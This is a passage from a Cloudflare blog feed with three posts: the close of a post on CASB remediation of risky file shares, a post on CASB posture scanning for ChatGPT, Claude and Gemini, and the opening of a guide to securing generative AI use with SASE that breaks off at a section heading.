    <p>We chose to start with Microsoft 365 and Google Workspace because, for many organizations, that’s where the bulk of their business-critical documents live: internal financials, product roadmaps, customer contracts, HR notes, and more.</p><p>They’re also where “temporary” sharing tends to linger too long:</p><ul><li><p>A spreadsheet shared “Anyone with the link can edit” for a quick review.</p></li><li><p>A doc made company-wide for an all-hands, then quietly forgotten.</p></li><li><p>A sheet of customer records shared to a contractor’s personal email.</p></li></ul><p>For Microsoft 365, that means cleaning up risky shares in places like OneDrive and SharePoint. For Google Workspace, it means tightening sharing on Docs, Sheets, Slides, and other files stored in Drive.</p><p>Instead of exporting a CSV of risky files out of CASB, sending it to app owners, and hoping everyone gets around to fixing their share settings, <b>you can drive the clean-up directly from CASB and know when those risks have actually been addressed</b>.</p><p>And when you and your team use <a href="https://developers.cloudflare.com/cloudflare-one/cloud-and-saas-findings/manage-findings/#remediate-findings"><u>CASB Remediation</u></a>, every action is logged in Cloudflare One’s <a href="https://developers.cloudflare.com/cloudflare-one/insights/logs/"><u>Admin logs</u></a>, so you can see who took action on which files and when, or export that activity to your security information and event management tool (SIEM).</p>
    <div>
      <h2>How it works</h2>
      <a href="#how-it-works">
        
      </a>
    </div>
    <p>When architecting the system that supports CASB Remediations, we knew it had to do three things really well:</p><ul><li><p>Be fast, even at scale</p></li><li><p>Durable execution to handle surprises gracefully</p></li><li><p>Be easy for our customers to use </p></li></ul><p>To meet these goals, we built a system using several Cloudflare products: <a href="https://workers.cloudflare.com/"><u>Workers</u></a>, <a href="https://workers.cloudflare.com/product/workflows/"><u>Workflows</u></a>, <a href="https://workers.cloudflare.com/product/queues/"><u>Queues</u></a>, <a href="https://workers.cloudflare.com/product/kv/"><u>Workers KV</u></a>, <a href="https://developers.cloudflare.com/secrets-store/"><u>Secrets Store</u></a>, and <a href="https://workers.cloudflare.com/product/hyperdrive/"><u>Hyperdrive</u></a>. </p><p>When a remediation job is initiated, an API call is made to a Worker. That Worker writes the job to a Queue which is consumed by a second Worker to kick off a Workflow. Workers KV and Secrets Store are used to securely distribute credentials for use in the Workflow. The Workflow runs a series of steps to collect information and execute third-party API calls to complete the remediation. The final outcome of the action is recorded in a database via Hyperdrive. </p><p>At scale, we are guaranteed to encounter 429s from vendor APIs. Workflows’ native retries simplify handling this, and built-in step logging gives visibility into each retry. This means that there was no need for us to build a complex, single-purpose, state-tracking system or dozens of serverless functions for each action.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6TMLm3Wqw5AQHPj6y26Ac4/9acc4fa8b1d1b8f378ab9a23f52e1bdd/image1.png" />
          </figure><p>Performance results from load testing and early access customers have shown strong performance even under heavy load. The average (p50) end-to-end job completion time is 48 seconds, and the p90 is 72 seconds. Durable Execution (via Workflows) has made job management completely hands-off for our team, even when the Workflow encounters issues with third-party APIs. The simplicity of the final system has made troubleshooting issues fast and straightforward.</p>
    <div>
      <h2>What’s next for CASB Remediation</h2>
      <a href="#whats-next-for-casb-remediation">
        
      </a>
    </div>
    <p>File-sharing Remediation for Microsoft 365 and Google Workspace is just the first step.</p><p>In the near term, we’re working on bringing our customers new Quarantine actions, which can move or isolate high-risk files to safer locations. We are also introducing Custom Webhook actions, hooks that let you trigger downstream workflows, like ticket creation, chat notifications, or your own automation.</p><p>And more broadly, we’re excited to explore ways to make CASB even more of an active control plane:</p><ul><li><p>Autoremediation policies for carefully scoped, policy-driven fixes where you’re comfortable letting CASB take action automatically.</p></li><li><p>Custom CASB findings so you can define the exact patterns, data types, or access conditions that matter most to your organization.</p></li><li><p>Bulk Remediation that allows you to remediate many similar findings in a single operation.</p></li><li><p>Extending Remediation to additional SaaS integrations beyond Microsoft 365 and Google Workspace, so the same experience applies to tools like Box, Dropbox, Salesforce, GitHub, Slack, Atlassian, and more over time.</p></li></ul>
    <div>
      <h2>How to get started</h2>
      <a href="#how-to-get-started">
        
      </a>
    </div>
    <p>CASB Remediation requires a paid CASB license, but don’t let that stop you from trying CASB out today!</p><ul><li><p><b>For existing Cloudflare One / CASB customers:</b> Integrate your Microsoft 365 or Google Workspace tenant (or update your existing integration to Read-Write), and start remediating risky shares directly from the side panel within your file sharing-related finding types.</p></li><li><p><b>New to Cloudflare One?</b> <a href="https://dash.cloudflare.com/sign-up/zero-trust"><u>Sign up now</u></a> for 50 free seats to begin using CASB immediately. For larger deployments, request a <a href="https://www.cloudflare.com/contact/sase/?utm_medium=referral&amp;utm_source=blog"><u>consultation with our experts</u></a>.</p></li></ul><p>From there, talk to our team about enabling CASB with Remediation for your Microsoft 365 and Google Workspace tenants so you can find and fix overshared files in one place.</p><p>We’re excited to see how you use Remediation to clean up long-lived file-sharing risks — and to help shape what CASB’s next generation of remediation capabilities looks like.</p> ]]></content:encoded>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Microsoft 365]]></category>
            <category><![CDATA[Google Workspace]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[SAAS Security]]></category>
            <guid isPermaLink="false">5qLzg7UQ9OtFryC8YVeSo5</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
            <dc:creator>Michael Leslie </dc:creator>
        </item>
        <item>
            <title><![CDATA[ChatGPT, Claude, & Gemini security scanning with Cloudflare CASB]]></title>
            <link>https://blog.cloudflare.com/casb-ai-integrations/</link>
            <pubDate>Tue, 26 Aug 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare CASB now scans ChatGPT, Claude, and Gemini for misconfigurations, sensitive data exposure, and compliance issues, helping organizations adopt AI with confidence.
 ]]></description>
            <content:encoded><![CDATA[ <p>Starting today, all users of <a href="https://www.cloudflare.com/zero-trust/"><u>Cloudflare One</u></a>, our <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/"><u>secure access service edge (SASE)</u></a> platform, can use our API-based <a href="https://www.cloudflare.com/zero-trust/products/casb/"><u>Cloud Access Security Broker (CASB)</u></a> to assess the security posture of their generative AI (GenAI) tools: specifically, OpenAI’s <a href="https://chatgpt.com/"><u>ChatGPT</u></a>, <a href="https://www.anthropic.com/claude"><u>Claude</u></a> by Anthropic, and Google’s <a href="https://gemini.google.com/"><u>Gemini</u></a>. Organizations can connect their GenAI accounts and within minutes, start detecting misconfigurations, <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>Data Loss Prevention (DLP)</u></a> matches, data exposure and sharing, compliance risks, and more — all without having to install cumbersome software onto user devices.</p><p>As <a href="https://www.cloudflare.com/learning/ai/what-is-generative-ai/"><u>Generative AI</u></a> adoption has exploded in the enterprise, IT and Security teams need to hustle to keep themselves abreast of newly emerging <a href="https://www.cloudflare.com/the-net/generative-ai-zero-trust/"><u> security and compliance challenges</u></a> that come alongside these powerful tools. In this rapidly changing landscape, IT and Security teams need tools that help <a href="https://www.cloudflare.com/ai-security/">enable AI adoption while still protecting the security and privacy of their enterprise networks and data</a>. </p><p>Cloudflare’s API CASB and inline CASB work together to help organizations safely adopt AI tools. The API CASB integrations provide out-of-band visibility into data at rest and security posture inside popular AI tools like ChatGPT, Claude, and Gemini. At the same time, Cloudflare Gateway provides <a href="https://blog.cloudflare.com/ai-prompt-protection"><u>in-line prompt controls</u></a> and <a href="https://blog.cloudflare.com/shadow-AI-analytics"><u>Shadow AI</u></a> identification. It applies policies and DLP to traffic as it moves to these AI providers. Together, these features give organizations a unified control plane for <a href="https://blog.cloudflare.com/best-practices-sase-for-ai/">securing their use of GenAI</a>.</p>
    <div>
      <h3>What’s new</h3>
      <a href="#whats-new">
        
      </a>
    </div>
    <p>ChatGPT, Claude and Gemini are now all live in the integrations supported by <a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/"><u>Cloudflare’s API CASB</u></a>. These integrations are available to all Cloudflare One users, account owners can easily connect their GenAI tenants, and CASB will scan for security issues across multiple domains:</p><ul><li><p><b>Agentless Connections:</b> Connect ChatGPT, Claude, and Gemini via agentless, API‑based integrations to scan posture and data risks; no endpoint software to install.</p></li><li><p><b>Posture Management:</b> Detect insecure settings and misconfigurations that can lead to data exposure or misuse.</p></li><li><p><b>DLP Detection:</b> Identify where <a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/"><u>sensitive data</u></a> has been uploaded in chat attachments (prompts coming soon).</p></li><li><p><b>GenAI-specific Insights:</b> Surface risks associated with the unique capability of a given AI provider's toolsets.</p></li></ul><p>Admins can now answer questions like: What are our employees doing in ChatGPT? What data is being uploaded and used in Claude? Is Gemini configured correctly in Google Workspace?</p><p>Now let’s take a closer look at each integration.</p>
    <div>
      <h3>OpenAI ChatGPT</h3>
      <a href="#openai-chatgpt">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6dO0h3q9modcmRPAQeiCOH/d8d54f5233e0026a63569b53cbb8d9a6/image2.png" />
          </figure><p>Cloudflare’s CASB integration with OpenAI’s ChatGPT scans for several types of insights, including:</p><ul><li><p><b>Capability Activation</b>: Highlights capabilities that are specific to ChatGPT’s feature set, like <a href="https://platform.openai.com/docs/actions/introduction"><u>actions</u></a>, <a href="https://platform.openai.com/docs/guides/tools-code-interpreter"><u>code execution</u></a>, <a href="https://help.openai.com/en/articles/9237897-chatgpt-search"><u>web access</u></a>.</p></li><li><p><b>External Exposure: </b>Finds chats and GPTs that are shared beyond the tenant, like GPTs shared publicly or listed on the <a href="https://openai.com/index/introducing-the-gpt-store/"><u>GPT Store</u></a>, and ties them back to their owners for quick triage.</p></li><li><p><b>Secrets, Keys and Invites</b>: Identifies API keys that aren’t rotated or are no longer used to maintain credential hygiene. Identifies over‑privileged or stale invites.</p></li><li><p><b>Sensitive Content (via DLP)</b>: Detects sensitive data (e.g. credential and secrets, financial / health information, source code, etc.) via <a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-profiles/"><u>DLP profile</u></a> matches in uploaded chat attachments to enable targeted response.</p></li></ul>
    <div>
      <h3>Anthropic Claude</h3>
      <a href="#anthropic-claude">
        
      </a>
    </div>
    <p>For Claude, Cloudflare is able to provide the following out-of-band detections:</p><ul><li><p><b>Secrets, Keys and Invites:</b> Surfaces high‑risk invites and entitlement drift early so the least‑privilege access control stays tight. Spots unused API keys and rotation gaps before they turn into forgotten open doors.</p></li><li><p><b>Sensitive Content (via DLP)</b>: Monitors for <a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-profiles/predefined-profiles/"><u>sensitive data</u></a> in uploaded files to help organizations safely enable Claude usage while maintaining compliance. Security teams get this information as quickly as CASB scans, giving them the visibility they need to help employees use Claude productively and securely with sensitive data.</p></li></ul><p>As Anthropic continues to expand Claude's API capabilities and features, Cloudflare will add corresponding security detections to match new functionality as it becomes available.</p>
    <div>
      <h3>Google Gemini</h3>
      <a href="#google-gemini">
        
      </a>
    </div>
    <p>Cloudflare’s detections for Google Gemini appear as part of our API CASB integration for Google Workspace:</p><ul><li><p><b>Identity &amp; MFA</b>: Identifies Gemini users and admins without MFA, leaving them prime targets for compromise. Imagine if an IT admin relied on Gemini daily to process corporate data, but their Google Workspace account lacked multi-factor authentication. One successful phishing email could give an attacker privileged access to Gemini and the wider Google Workspace environment — turning a minor oversight into an organization-wide breach. </p></li><li><p><b>License Hygiene</b>: Flags suspended accounts still holding Gemini or <a href="https://support.google.com/a/answer/16345165"><u>AI Ultra</u></a> licenses to cut cost and reduce exposure. An AI Ultra user has access to more powerful and riskier features, like <a href="https://deepmind.google/models/project-mariner/"><u>Project Mariner</u></a>, a research prototype that acts as an autonomous agent, capable of automating up to 10 tasks simultaneously across web browsers. An attacker can cause more damage by compromising an AI Ultra user, which is why we include this in our set of detections.</p></li></ul><p>The Gemini integration has a narrower scope because Google has structured their product and API differently than OpenAI or Anthropic. For organizations, Gemini is delivered as a <a href="https://workspace.google.com/"><u>Google Workspace</u></a> add-on. Enterprises enable Gemini features in Gmail, Docs, Sheets, and other Google Workspace apps through add-on licenses such as Gemini Enterprise or AI Ultra. Our CASB detections focus on identity, MFA, and license hygiene, rather than posture issues like public sharing or custom assistant publishing because Gemini does not yet provide those API endpoints.</p>
    <div>
      <h3>The Future of GenAI Posture Management</h3>
      <a href="#the-future-of-genai-posture-management">
        
      </a>
    </div>
    <p>Like countless other organizations, Cloudflare is adopting GenAI, on the same journey to make these environments even safer than they are today. We are excited to extend our management coverage to our customers so they can continue to innovate with GenAI. But looking ahead, we’re encouraged to see GenAI providers take concrete steps towards making security, compliance, and data privacy even more important tenets of their platforms.</p>
    <div>
      <h3>Secure GenAI beyond the reach of Inline Controls</h3>
      <a href="#secure-genai-beyond-the-reach-of-inline-controls">
        
      </a>
    </div>
    <p>Generative AI adoption brings new security requirements. Cloudflare CASB delivers out-of-band visibility across these tools, surfacing insights on top of inline controls. With posture, access, and data under control, organizations can embrace GenAI confidently and securely.</p><p><b>How to get started:</b></p><ul><li><p><b>For existing Cloudflare One customers:</b> Contact your account manager or enable the integrations directly in your dashboard today.</p></li><li><p><b>New to Cloudflare One?</b> <a href="https://dash.cloudflare.com/sign-up/zero-trust"><u>Sign up now</u></a> for 50 free seats to begin securely using Gen AI immediately. For larger deployments, request a <a href="https://www.cloudflare.com/products/zero-trust/plans/enterprise/?utm_medium=referral&amp;utm_source=blog&amp;utm_campaign=2025-q3-acq-gbl-connectivity-ge-ge-general-ai_week_blog"><u>consultation with our experts</u></a>.</p></li></ul><p>If you want to preview other new functionality and help shape our roadmap,<a href="https://www.cloudflare.com/lp/ai-security-user-research-program-2025"><u> express interest in our user research program</u></a> for <a href="https://www.cloudflare.com/learning/ai/what-is-ai-security/">AI security</a>. </p><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[AI Week]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[AI-SPM]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[SAAS Security]]></category>
            <guid isPermaLink="false">ZCOT8h5K8IwD7kDikj0G1</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
        </item>
        <item>
            <title><![CDATA[Best Practices for Securing Generative AI with SASE]]></title>
            <link>https://blog.cloudflare.com/best-practices-sase-for-ai/</link>
            <pubDate>Tue, 26 Aug 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ This guide provides best practices for Security and IT leaders to securely adopt generative AI using Cloudflare’s SASE architecture as part of a strategy for AI Security Posture Management (AI-SPM). ]]></description>
            <content:encoded><![CDATA[ <p>As <a href="https://www.cloudflare.com/learning/ai/what-is-generative-ai/"><u>Generative AI</u></a> revolutionizes businesses everywhere, security and IT leaders find themselves in a tough spot. Executives are mandating speedy adoption of Generative AI tools to drive efficiency and stay abreast of competitors. Meanwhile, IT and Security teams must rapidly develop an <a href="https://www.cloudflare.com/ai-security/">AI Security Strategy</a>, even before the organization really understands exactly how it plans to adopt and deploy Generative AI. </p><p>IT and Security teams are no strangers to “building the airplane while it is in flight”. But this moment comes with new and complex security challenges. There is an explosion in new AI capabilities adopted by employees across all business functions — both sanctioned and unsanctioned. AI Agents are ingesting authentication credentials and autonomously interacting with sensitive corporate resources. Sensitive data is being shared with AI tools, even as security and compliance frameworks struggle to keep up.</p><p>While it demands strategic thinking from Security and IT leaders, the problem of governing the use of AI internally is far from insurmountable. <a href="https://www.cloudflare.com/zero-trust/"><u>SASE (Secure Access Service Edge)</u></a> is a popular cloud-based network architecture that combines networking and security functions into a single, integrated service that provides employees with secure and efficient access to the Internet and to corporate resources, regardless of their location. The SASE architecture can be effectively extended to meet the risk and security needs of organizations in a world of AI. </p><p>Cloudflare’s SASE Platform is uniquely well-positioned to help IT teams govern their AI usage in a secure and responsible way — without extinguishing innovation. What makes Cloudflare different in this space is that we are one of the few SASE vendors that operate not just in cybersecurity, but also in AI infrastructure. This includes: providing AI infrastructure for developers (e.g. <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a>, <a href="https://developers.cloudflare.com/ai-gateway/"><u>AI Gateway</u></a>, <a href="https://developers.cloudflare.com/agents/guides/remote-mcp-server/"><u>remote MCP servers</u></a>, <a href="https://realtime.cloudflare.com/"><u>Realtime AI Apps</u></a>) to securing public-facing LLMs (e.g. <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>Firewall for AI</u></a> or <a href="https://blog.cloudflare.com/ai-labyrinth/"><u>AI Labyrinth</u></a>), to allowing content creators to <a href="https://blog.cloudflare.com/introducing-pay-per-crawl/"><u>charge AI crawlers for access to their content</u></a>, and the list goes on. Our expertise in this space gives us a unique view into governing AI usage inside an organization.  It also gives our customers the opportunity to plug different components of our platform together to build out their AI <i>and</i> AI cybersecurity infrastructure.</p><p>This week, we are taking this AI expertise and using it to help ensure you have what you need to implement a successful <a href="https://www.cloudflare.com/learning/ai/what-is-ai-security/">AI Security Strategy</a>. As part of this, we are announcing several new AI Security Posture Management (AI-SPM) features, including:</p><ul><li><p><a href="http://blog.cloudflare.com/shadow-AI-analytics/"><u>shadow AI reporting</u></a> to gain visibility into employee’s use of AI,</p></li><li><p><a href="http://blog.cloudflare.com/confidence-score-rubric/"><u>confidence scoring</u></a> of AI providers to manage risk, </p></li><li><p><a href="http://blog.cloudflare.com/ai-prompt-protection/"><u>AI prompt protection</u></a> to defend against malicious inputs and prevent data loss, </p></li><li><p>out-of-band <a href="http://blog.cloudflare.com/casb-ai-integrations/"><u>API CASB integrations </u></a>with AI providers to detect misconfigurations, </p></li><li><p>new tools that <a href="http://blog.cloudflare.com/zero-trust-mcp-server-portals/"><u>untangle and secure</u></a>  <a href="https://www.cloudflare.com/learning/ai/what-is-model-context-protocol-mcp/"><u>Model Context Protocol (MCP)</u></a> deployments in the enterprise.</p></li></ul><p>All of these new AI-SPM features are built directly into Cloudflare’s powerful <a href="https://www.cloudflare.com/zero-trust/"><u>SASE</u></a> platform.</p><p>And we’re just getting started. In the coming months you can expect to see additional valuable AI-SPM features launch across the <a href="https://www.cloudflare.com/"><u>Cloudflare platform</u></a>, as we continue investing in making Cloudflare the best place to protect, connect, and build with AI.</p>
    <div>
      <h3>What’s in this AI security guide?</h3>
      <a href="#whats-in-this-ai-security-guide">
        
      </a>
    </div>
    <p>In this guide, we will cover best practices for adopting generative AI in your organization using Cloudflare’s <a href="https://www.cloudflare.com/zero-trust/"><u>SASE (Secure Access Service Edge)</u></a> platform. We start by covering how IT and Security leaders can formulate their AI Security Strategy. Then, we show how to implement this strategy using long-standing features of our SASE platform alongside the new AI-SPM features we launched this week. </p><p>This guide below is divided into three key pillars for dealing with (human) employee access to AI – Visibility, Risk Management and Data Protection — followed by additional guidelines around deploying agentic AI in the enterprise using MCP. Our objective is to help you align your security strategy with your business goals while driving adoption of AI across all your projects and teams. </p><p>And we do this all using our single <a href="https://www.cloudflare.com/zero-trust/"><u>SASE</u></a> platform, so you don’t have to deploy and manage a complex hodgepodge of point solutions and security tools. In fact, we provide you with an overview of your AI security posture in a single dashboard, as you can see here:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5y6ZHDu9lwCSHZ1FuZsoWT/b3f6a9eb034a3cdb2b663cff428a2335/1.png" />
          </figure><p><i>AI Security Report in Cloudflare’s SASE platform</i></p>
    <div>
      <h2>Develop your AI Security Strategy</h2>
      <a href="#develop-your-ai-security-strategy">
        
      </a>
    </div>
    <p>The first step to securing AI usage is to establish your organization's level of risk tolerance. This includes pinpointing your biggest security concerns for your users and your data, along with relevant legal and compliance requirements.   Relevant issues to consider include: </p><ul><li><p>Do you have specific <b>sensitive data that should not be shared</b> with certain AI tools? (Some examples include personally identifiable information (PII), personal health information (PHI), sensitive financial data, secrets and credentials, source code or other proprietary business information.)</p></li><li><p>Are there <b>business decisions that your employees should not be making using assistance from AI</b>? (For instance, the EU AI Act AI prohibits the use of AI to evaluate or classify individuals based on their social behavior, personal characteristics, or personality traits.)</p></li><li><p>Are you subject to <b>compliance frameworks</b> that require you to produce records of the generative AI tools that your employees used, and perhaps even the prompts that your employees input into AI providers? (For example, HIPAA requires organizations to implement audit trails that records who accessed PHI and when, GDPR requires the same for PII, SOC2 requires the same for secrets and credentials.)</p></li><li><p>Do you have specific data protection requirements that require employees to use the <b>sanctioned, enterprise version of a certain generative AI provider</b>, and avoid certain AI tools or their consumer versions?  (Enterprise AI tools often have more favorable terms of service, including shorter data retention periods, more limited data-sharing with third-parties, and/or a promise not to train AI models on user inputs.)</p></li><li><p>Do you require employees to completely <b>avoid the use of certain AI tools</b>, perhaps because they are unreliable, unreviewed or headquartered in a risky geography? </p></li><li><p>Are there security protections offered by your organization's sanctioned AI providers and to what extent do you plan to <b>protect against misconfigurations of AI tools</b> that can result in leaks of sensitive data?  </p></li><li><p>What is your <a href="https://www.cloudflare.com/the-net/building-cyber-resilience/secure-govern-ai-agents/">policy around the use of autonomous AI agents</a>?  What is your strategy for <b>adopting the </b><a href="https://www.cloudflare.com/learning/ai/what-is-model-context-protocol-mcp/"><b><u>Model Context Protocol (MCP)</u></b></a>? (The Model Context Protocol is a standard way to make information available to large language models (LLMs), similar to the way an application programming interface (API) works. It supports agentic AI that autonomously pursues goals and takes action.)</p></li></ul><p>While almost every organization has relevant compliance requirements that implicate their use of generative AI, there is no “one size fits all” for addressing these issues. </p><ul><li><p>Some organizations have mandates to broadly adopt AI tools of all stripes, while others require employees to interact with sanctioned AI tools only. </p></li><li><p>Some organizations are rapidly adopting the MCP, while others are not yet ready for agents to autonomously interact with their corporate resources. </p></li><li><p>Some organizations have robust requirements around data loss prevention (DLP), while others are still early in the process of deploying DLP in their organization.</p></li></ul><p>Even with this diversity of goals and requirements, Cloudflare SASE provides a flexible platform for the implementation of your organization’s AI Security Strategy.</p>
    <div>
      <h2>Build a solid foundation for AI Security </h2>
      <a href="#build-a-solid-foundation-for-ai-security">
        
      </a>
    </div>
    <p>To implement your AI Security Strategy, you first need a solid <a href="https://developers.cloudflare.com/reference-architecture/architectures/sase/"><u>SASE deployment</u></a>. </p><p>SASE provides a unified platform that consolidates security and networking, replacing a fragmented patchwork of point solutions with a single platform that controls application visibility, user authentication, <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>Data Loss Prevention (DLP)</u></a>, and other policies for access to the Internet and access to internal corporate resources.  SASE is the essential foundation for an effective AI Security Strategy. </p><p><a href="https://www.cloudflare.com/learning/access-management/what-is-sase/"><u>SASE architecture</u></a> allows you to execute your AI security strategy by discovering and inventorying the AI tools used by your employees. With this visibility, you can proactively manage risk and support compliance requirements by monitoring AI prompts and responses to understand what data is being shared with AI tools. Robust DLP allows you to scan and block sensitive data from being entered into AI tools, preventing data leakage and protecting your organization's most valuable information. Our <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/"><u>Secure Web Gateway (SWG)</u></a> allows you to redirect traffic from unsanctioned AI providers to user education pages or to sanctioned enterprise AI providers. And our new integration of MCP tooling into our SASE platform helps you secure the deployment of agentic AI inside your organization.</p><p>If you're just starting your SASE journey, our <a href="https://developers.cloudflare.com/learning-paths/secure-internet-traffic/concepts/"><u>Secure Internet Traffic Deployment Guide</u></a> is the best place to begin. For this guide, however, we will skip these introductory details and dive right into using SASE to secure the use of Generative AI. </p>
    <div>
      <h2>Gain visibility into your AI landscape </h2>
      <a href="#gain-visibility-into-your-ai-landscape">
        
      </a>
    </div>
    <p>You can't protect what you can't see. The first step is to gain visibility into your AI landscape, which is essential for discovering and inventorying all the AI tools that your employees are using, deploying or experimenting with in your organization. </p>
    <div>
      <h3>Discover Shadow AI </h3>
      <a href="#discover-shadow-ai">
        
      </a>
    </div>
    <p>Shadow AI refers to the use of AI applications that haven't been officially sanctioned by your IT department. Shadow AI is not an uncommon phenomenon – Salesforce found that <a href="https://www.salesforce.com/news/stories/ai-at-work-research/?utm_campaign=amer_cbaw&amp;utm_content=Salesforce_World+Tour&amp;utm_medium=organic_social&amp;utm_source=linkedin"><u>over half of the knowledge workers it surveyed</u></a> admitted to using unsanctioned AI tools at work. Use of unsanctioned AI is not necessarily a sign of malicious intent; employees are often just trying to do their jobs better. As an IT or Security leader, your goal should be to discover Shadow AI and then apply the appropriate AI security policy. There are two powerful ways to do this: inline and out-of-band.</p>
    <div>
      <h4>Discover employee usage of AI, inline</h4>
      <a href="#discover-employee-usage-of-ai-inline">
        
      </a>
    </div>
    <p>The most direct way to get visibility is by using <a href="https://www.cloudflare.com/zero-trust/products/gateway/"><u>Cloudflare's Secure Web Gateway (SWG)</u></a>. </p><p>SWG helps you get a clear picture of both sanctioned and unsanctioned AI and chat applications. By reviewing your detected usage, you'll gain insight into which AI apps are being used in your organization. This knowledge is essential for building policies that support approved tools, and block or control risky ones. This feature requires you to deploy the WARP client in Gateway proxy mode on your end-user devices.</p><p>You can review your company’s AI app usage using our new Application Library and <a href="http://blog.cloudflare.com/shadow-AI-analytics/"><u>Shadow IT </u></a>dashboards. These tools allow you to: </p><ul><li><p>Review traffic from user devices to understand how many users engage with a specific application over time.</p></li><li><p>Denote application’s status (e.g., Approved, Unapproved) inside your organization, and use that as input to a variety of SWG policies that control access to applications with that status. </p></li><li><p> Automate assessment of SaaS and Gen AI applications at scale with our soon-to-be-released <a href="http://blog.cloudflare.com/confidence-score-rubric/"><u>Cloudflare Application Confidence Scores</u><b><u>. </u></b></a></p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3NFrOpJkBMH6tsPZVec02Q/37b54f7477082dedcac2adcba31e2c29/2.png" />
          </figure><p><sup><i>Shadow IT dashboard showing utilization of applications of different status (Approved, Unapproved, In Review, Unreviewed).</i></sup></p>
    <div>
      <h4>Discover employee usage of AI, out-of-band</h4>
      <a href="#discover-employee-usage-of-ai-out-of-band">
        
      </a>
    </div>
    <p>Even if your organization doesn't use a device client, you can still get valuable data on Shadow AI usage if you use Cloudflare's integrations for Cloud Access Security Broker (<a href="https://www.cloudflare.com/zero-trust/products/casb/"><u>CASB</u></a>) with services like Google Workspace, Microsoft 365, or GitHub. </p><p><a href="https://www.cloudflare.com/zero-trust/products/casb/"><u>Cloudflare CASB</u></a> provides high-fidelity detail about your SaaS environments, including sensitive data visibility and suspicious user activity. By integrating CASB with your SSO provider, you can see if your users have authenticated to any third-party AI applications, giving you a clear and non-invasive sense of app usage across your organization.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3HDUtSAX9f5XZasSyACTiV/367f80a5d745070fd8e0191d0e36e61d/3.png" />
          </figure><p><sup><i>An API CASB integration with Google Workspace, showing findings filtered to third party integrations. Findings discover multiple LLM integrations.</i></sup></p>
    <div>
      <h2>Implement an AI risk management framework</h2>
      <a href="#implement-an-ai-risk-management-framework">
        
      </a>
    </div>
    <p>Now that you’ve gained visibility into your AI landscape, the next step is to proactively manage that risk. Cloudflare’s SASE platform allows you to monitor AI prompts and responses, enforce granular security policies, coach users on secure behavior, and prevent misconfigurations in your enterprise AI providers.</p>
    <div>
      <h3>Detect and monitor AI prompts and responses</h3>
      <a href="#detect-and-monitor-ai-prompts-and-responses">
        
      </a>
    </div>
    <p>If you have <a href="https://developers.cloudflare.com/learning-paths/replace-vpn/configure-device-agent/enable-tls-decryption/"><u>TLS decryption enabled</u></a> in your SASE platform, you can gain new and powerful insights into how your employees are using AI with our new <a href="http://blog.cloudflare.com/ai-prompt-protection/"><u>AI prompt protection</u></a> feature.  </p><p>AI Prompt Protection provides you with visibility into the exact prompts and responses from your employees’ interactions with supported AI applications. This allows you to go beyond simply knowing which tools are being used and gives you insight into exactly what kind of information is being shared.  </p><p>This feature also works with <a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-profiles/"><u>DLP profiles</u></a> to detect sensitive data in prompts. You can also choose whether to block the action or simply monitor it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/JpNZiyklt6qBRjW4LZuSW/1ea4043b6d03f8de31ce24175aa6ca02/4.png" />
          </figure><p><sup><i>Log entry for a prompt detected using AI prompt protection.</i></sup></p>
    <div>
      <h3>Build granular AI security policies</h3>
      <a href="#build-granular-ai-security-policies">
        
      </a>
    </div>
    <p>Once your monitoring tools give you a clear understanding of AI usage, you can begin building security policies to achieve your security goals. Cloudflare's Gateway allows you to create policies based on application categories, application approval status, users, user groups, and device status. For example, you can:</p><ul><li><p>create policies to explicitly allow approved AI applications while blocking unapproved AI applications;</p></li><li><p>create <a href="https://developers.cloudflare.com/changelog/2025-04-11-http-redirect-custom-block-page-redirect/"><u>policies that redirect users</u></a> from unapproved AI applications to an approved AI application;</p></li><li><p>limit access to certain applications to specific users or groups that have specific device security posture;</p></li><li><p>build policies to enable prompt capture (with<a href="http://blog.cloudflare.com/ai-prompt-protection/"><u> AI prompt protection</u></a>) for specific high-risk user groups, such as contractors or new employees, without affecting the rest of the organization; and</p></li><li><p>put certain applications behind <a href="https://developers.cloudflare.com/cloudflare-one/policies/browser-isolation/"><u>Remote Browser Isolation (RBI)</u></a>, to prevent end users from uploading files or pasting data into the application.</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2BCDxoKrUDRAOO13V8Qd4W/28e84e4529f3e040ba4a2c3c98c6eed7/5.png" />
          </figure><p><sup><i>Gateway application status policy selector</i></sup></p><p>All of these policies can be written in Cloudflare Gateway’s unified policy builder, making it easy to deploy your AI Security Strategy across your organization.</p>
    <div>
      <h3>Control access to internal LLMs </h3>
      <a href="#control-access-to-internal-llms">
        
      </a>
    </div>
